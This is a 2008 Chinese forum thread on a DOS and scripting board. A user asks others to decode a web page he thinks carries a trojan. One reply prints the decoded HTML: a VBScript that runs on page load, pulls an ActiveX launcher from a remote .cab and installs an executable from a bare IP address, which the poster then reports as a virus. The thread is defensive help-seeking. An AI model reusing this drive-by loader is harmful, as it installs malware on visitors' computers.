中国DOS联盟

-- 联合DOS 推动DOS 发展DOS --

联盟域名：www.cn-dos.net 论坛域名：www.cn-dos.net/forum
DOS，代表着自由开放与发展，我们努力起来，学习FreeDOS和Linux的自由开放与GNU精神，共同创造和发展美好的自由与GNU GPL世界吧！

游客: 注册 | 登录 | 命令行 | 会员 | 搜索 | 上传 | 帮助 »

中国DOS联盟论坛 » DOS批处理 & 脚本技术（批处理室） » 我中木马了高手帮我看下

hazjs
初级用户

积分 60
发帖 25
注册 2007-6-24
状态离线

『楼主』: 我中木马了高手帮我看下

<HTML>
<HEAD>
<SCRIPT LANGUAGE="Javascript">

</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>

2008-5-21 21:36

hazjs
初级用户

积分 60
发帖 25
注册 2007-6-24
状态离线

『第 2 楼』:

帮忙解密下我看看中了什么木马

2008-5-21 21:48

PPdos
高级用户

积分 783
发帖 268
注册 2006-12-26
状态离线

『第 3 楼』:

你怎么就知道这一定是木马尼？

我看像只虫子在找洞。。。

菩提本无树,明镜亦非台,本来无一物,何处惹尘埃.

2008-5-22 06:16

hazjs
初级用户

积分 60
发帖 25
注册 2007-6-24
状态离线

『第 4 楼』:

我知道是马,是调用什么控件的具体我不知道

2008-5-22 06:37

jmz573515
银牌会员

积分 1212
发帖 464
注册 2006-12-13
状态离线

『第 5 楼』:

好像是这个内容,看不懂~~~

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<!-- saved from url=(0032)http://lihua.g1.51web.cn/say.htm -->

<!-- saved from url=(0030)http://web.nt100m.com/saynsay/ --><HTML><HEAD><TITLE>saynsay.com</TITLE>

<META http-equiv=Content-Type content="text/html; charset=gb2312">

<SCRIPT language=vbscript>

        Sub start()

   SHlaunch.PRODUCT="SaynSay 5.x"        

   SHlaunch.VER=""        

   SHlaunch.VERFULL="4.0.3.9"        

   SHlaunch.UPGRADEURL="http://web.nt100m.com/saynsay//upgrade/"

   SHlaunch.INSTALLURL="http://218.4.83.45/1/2.exe"

   SHlaunch.PageInstallURL="http://web.nt100m.com/saynsay/setup.html"

   SHlaunch.PageUpgradeURL="http://web.nt100m.com/saynsay/update.html"        

   SHlaunch.PageErrorURL="http://web.nt100m.com/saynsay/error_china.html"

   SHlaunch.PageDownloadURL="http://web.nt100m.com/saynsay/download.html"

   SHlaunch.PageWidth=0  

   SHlaunch.PageHeight=0

   SHlaunch.WriteInfo "ADDR1IP","127.0.0.1"                

   SHlaunch.WriteInfo "LOUNGEHELP","http://www.saynsay.com/customer/help/help.asp"

   SHlaunch.WriteInfo "DATEROOMHELP","http://www.saynsay.com/customer/help/help.asp"

   SHlaunch.WriteInfo "MULTIROOMHELP","http://www.saynsay.com/customer/help/help.asp"

   SHlaunch.WriteInfo "ACCUSEURL","http://www.saynsay.com/user/form.asp"        

   SHlaunch.WriteInfo "USERINFOURL","http://www.saynsay.com/user/userinfo.asp"

   SHlaunch.WriteInfo "VIDEOURL",""

   SHlaunch.WriteInfo "MYINFOURL","http://www.saynsay.com/user/myinfo.asp"        

   SHlaunch.WriteInfo "DATEINFOURL","http://www.saynsay.com/user/dateinfo.asp"

   SHlaunch.WriteInfo "DOWNLOADURL","http://www.saynsay.com/customer/faq.asp"

   SHlaunch.WriteInfo "AVATARURL","http://www.saynsay.com/avatar/chat_avatar.asp"

   SHlaunch.WriteInfo "AVATARURL2","http://www.saynsay.com/avatar/chat_avatar_big.asp"

   SHlaunch.WriteInfo "BANNERURL","http://www.saynsay.com//user/linead/banner.htm" 

   SHlaunch.WriteInfo "CHATNOTICEURL","<img src='http://www.saynsay.com/user/chatimg/chat_notice.gif'>"

   SHlaunch.WriteInfo "NEWWINDOWURL","http://www.saynsay.com/user/newwindow/window.asp"

   SHlaunch.WriteInfo "SERVERLISTURL","http://www.saynsay.com/user/serverlist/serverlist.asp"

   SHlaunch.ARGUMENT=","

   SHlaunch.Start

   end sub

        </SCRIPT>

<SCRIPT language=javaScript event=FinishInstall for=SHlaunch>

        self.close();

</SCRIPT>

<META content="MSHTML 6.00.2900.2180" name=GENERATOR></HEAD>

<BODY oncontextmenu=self.event.returnValue=false onselectstart="return false" 

onload=start()>

<OBJECT id=SHlaunch style="LEFT: 0px; TOP: 0px" 

codeBase=http://61.155.9.9/SHLauncher_1001.cab#version=1,0,0,1 

classid=CLSID:53FF03ED-FF9A-41A3-9D18-7032C6B8A67B><PARAM NAME="_Version" VALUE="65536"><PARAM NAME="_ExtentX" VALUE="2646"><PARAM NAME="_ExtentY" VALUE="1323"><PARAM NAME="_StockProps" VALUE="0"></OBJECT></BODY></HTML>

2008-5-22 09:38

hazjs
初级用户

积分 60
发帖 25
注册 2007-6-24
状态离线

『第 6 楼』:

谢谢楼上的
这个就是木马http://218.4.83.45/1/2.exe我已经上报了此病毒

2008-5-23 11:11

请注意：您目前尚未注册或登录，请您注册或登录以使用论坛的各项功能，例如发表和回复帖子等。

可打印版本 | 推荐给朋友 | 订阅主题 | 收藏主题

论坛跳转: